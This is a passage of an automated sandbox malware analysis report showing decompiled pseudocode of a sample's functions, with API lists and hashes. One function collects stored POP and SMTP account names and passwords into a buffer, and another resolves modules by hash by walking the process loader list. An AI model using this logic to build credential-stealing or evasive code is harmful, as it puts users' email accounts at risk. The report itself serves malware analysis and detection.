                          				return _t4;
                          			}





                          0x00403bc4
                          0x00403bcc
                          0x00403bcf

                          APIs
                          • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                          • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                          • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                          • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004049FF(void* _a4) {
                          				long _t3;
                          				void* _t4;
                          
                          				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                          				_t3 = RegCloseKey(_a4); // executed
                          				return _t3;
                          			}





                          0x00404a0d
                          0x00404a15
                          0x00404a18

                          APIs
                          • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                          • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                          • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                          • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403B64(WCHAR* _a4) {
                          				int _t3;
                          				void* _t4;
                          
                          				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                          				_t3 = PathFileExistsW(_a4); // executed
                          				return _t3;
                          			}





                          0x00403b72
                          0x00403b7a
                          0x00403b7d

                          APIs
                          • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID:
                          • API String ID: 1174141254-0
                          • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                          • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                          • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                          • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • closesocket.WS2_32(00404EB0), ref: 00404DEB
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: closesocket
                          • String ID:
                          • API String ID: 2781271927-0
                          • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                          • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                          • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                          • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403F9E(void* _a4) {
                          				int _t3;
                          				void* _t4;
                          
                          				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                          				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                          				return _t3;
                          			}





                          0x00403fac
                          0x00403fba
                          0x00403fbe

                          APIs
                          • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeVirtual
                          • String ID:
                          • API String ID: 1263568516-0
                          • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                          • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                          • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                          • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00406472(long _a4) {
                          				void* _t3;
                          				void* _t4;
                          
                          				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                          				Sleep(_a4); // executed
                          				return _t3;
                          			}





                          0x0040647f
                          0x00406487
                          0x0040648a

                          APIs
                          • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                          • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                          • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                          • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004058EA(char* _a4, char* _a8) {
                          				char* _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
                          				_t4 = StrStrA(_a4, _a8); // executed
                          				return _t4;
                          			}





                          0x004058f8
                          0x00405903
                          0x00405906

                          APIs
                          • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                          • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                          • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                          • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405924(WCHAR* _a4, WCHAR* _a8) {
                          				WCHAR* _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
                          				_t4 = StrStrW(_a4, _a8); // executed
                          				return _t4;
                          			}





                          0x00405932
                          0x0040593d
                          0x00405940

                          APIs
                          • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                          • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                          • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                          • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                          				signed int _v8;
                          				signed int _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				intOrPtr _v40;
                          				intOrPtr _v44;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr _t40;
                          				intOrPtr _t45;
                          				intOrPtr _t47;
                          				void* _t71;
                          				void* _t75;
                          				void* _t77;
                          
                          				_t72 = _a4;
                          				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
                          				_t81 = _t71;
                          				if(_t71 != 0) {
                          					_push(__ebx);
                          					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
                          					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                          					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
                          					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                          					_v8 = _v8 & 0x00000000;
                          					_v20 = _t40;
                          					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
                          					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                          					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                          					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                          					_v12 = _v12 & 0x00000000;
                          					_v32 = _t45;
                          					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
                          					_t77 = _t75 + 0x50;
                          					_v36 = _t47;
                          					if(_v8 != 0 || _v12 != 0) {
                          						E00405872( *0x49f934, _t71, 1, 0);
                          						E00405872( *0x49f934, _t67, 1, 0);
                          						_t74 = _v16;
                          						E00405872( *0x49f934, _v16, 1, 0);
                          						E00405781( *0x49f934, _v40);
                          						E00405872( *0x49f934, _v20, 1, 0);
                          						_push(_v8);
                          						E00405762(_v16,  *0x49f934, _v24);
                          						E00405872( *0x49f934, _v28, 1, 0);
                          						E00405781( *0x49f934, _v44);
                          						E00405872( *0x49f934, _v32, 1, 0);
                          						_push(_v12);
                          						E00405762(_t74,  *0x49f934, _v36);
                          						_t77 = _t77 + 0x88;
                          					} else {
                          						_t74 = _v16;
                          					}
                          					E0040471C(_t71);
                          					E0040471C(_t67);
                          					E0040471C(_t74);
                          					E0040471C(_v20);
                          					E0040471C(_v24);
                          					E0040471C(_v28);
                          					E0040471C(_v32);
                          					E0040471C(_v36);
                          				}
                          				return 1;
                          			}





















                          0x0040d070
                          0x0040d080
                          0x0040d084
                          0x0040d086
                          0x0040d08c
                          0x0040d0a0
                          0x0040d0ae
                          0x0040d0bd
                          0x0040d0c0
                          0x0040d0c5
                          0x0040d0c9
                          0x0040d0e3
                          0x0040d0f2
                          0x0040d101
                          0x0040d104
                          0x0040d109
                          0x0040d110
                          0x0040d11e
                          0x0040d123
                          0x0040d126
                          0x0040d12d
                          0x0040d145
                          0x0040d154
                          0x0040d15a
                          0x0040d166
                          0x0040d174
                          0x0040d186
                          0x0040d18e
                          0x0040d19a
                          0x0040d1ac
                          0x0040d1ba
                          0x0040d1cc
                          0x0040d1d1
                          0x0040d1dd
                          0x0040d1e2
                          0x0040d1e7
                          0x0040d1e7
                          0x0040d1e7
                          0x0040d1eb
                          0x0040d1f1
                          0x0040d1f7
                          0x0040d1ff
                          0x0040d207
                          0x0040d20f
                          0x0040d217
                          0x0040d21f
                          0x0040d227
                          0x0040d230

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                          • API String ID: 0-2111798378
                          • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                          • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                          • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                          • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E0040317B(intOrPtr _a4) {
                          				signed int _v8;
                          				intOrPtr _v12;
                          				void* __ecx;
                          				intOrPtr _t17;
                          				void* _t21;
                          				intOrPtr* _t23;
                          				void* _t26;
                          				void* _t28;
                          				intOrPtr* _t31;
                          				void* _t33;
                          				signed int _t34;
                          
                          				_push(_t25);
                          				_t1 =  &_v8;
                          				 *_t1 = _v8 & 0x00000000;
                          				_t34 =  *_t1;
                          				_v8 =  *[fs:0x30];
                          				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
                          				_t31 = _t23;
                          				do {
                          					_v12 =  *((intOrPtr*)(_t31 + 0x18));
                          					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
                          					_pop(_t26);
                          					_t35 = _t28;
                          					if(_t28 == 0) {
                          						goto L3;
                          					} else {
                          						E004032EA(_t35, _t28, 0);
                          						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
                          						_t33 = _t33 + 0x14;
                          						if(_a4 == _t21) {
                          							_t17 = _v12;
                          						} else {
                          							goto L3;
                          						}
                          					}
                          					L5:
                          					return _t17;
                          					L3:
                          					_t31 =  *_t31;
                          				} while (_t23 != _t31);
                          				_t17 = 0;
                          				goto L5;
                          			}














                          0x0040317f
                          0x00403180
                          0x00403180
                          0x00403180
                          0x0040318d
                          0x00403196
                          0x00403199
                          0x0040319b
                          0x004031a1
                          0x004031a9
                          0x004031ab
                          0x004031ac
                          0x004031ae
                          0x00000000
                          0x004031b0
                          0x004031b3
                          0x004031c2
                          0x004031c7
                          0x004031cd
                          0x004031e0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004031cd
                          0x004031d7
                          0x004031dd
                          0x004031cf
                          0x004031cf
                          0x004031d1
                          0x004031d5
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                          • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                          • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                          • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040438F
                          • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                          • VariantInit.OLEAUT32(?), ref: 004043C4
                          • SysAllocString.OLEAUT32(?), ref: 004043CD
                          • VariantInit.OLEAUT32(?), ref: 00404414
                          • SysAllocString.OLEAUT32(?), ref: 00404419
                          • VariantInit.OLEAUT32(?), ref: 00404431
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: InitVariant$AllocString$CreateInitializeInstance
                          • String ID:
                          • API String ID: 1312198159-0
                          • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                          • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                          • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                          • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                          Uniqueness

                          Uniqueness Score: -1.00%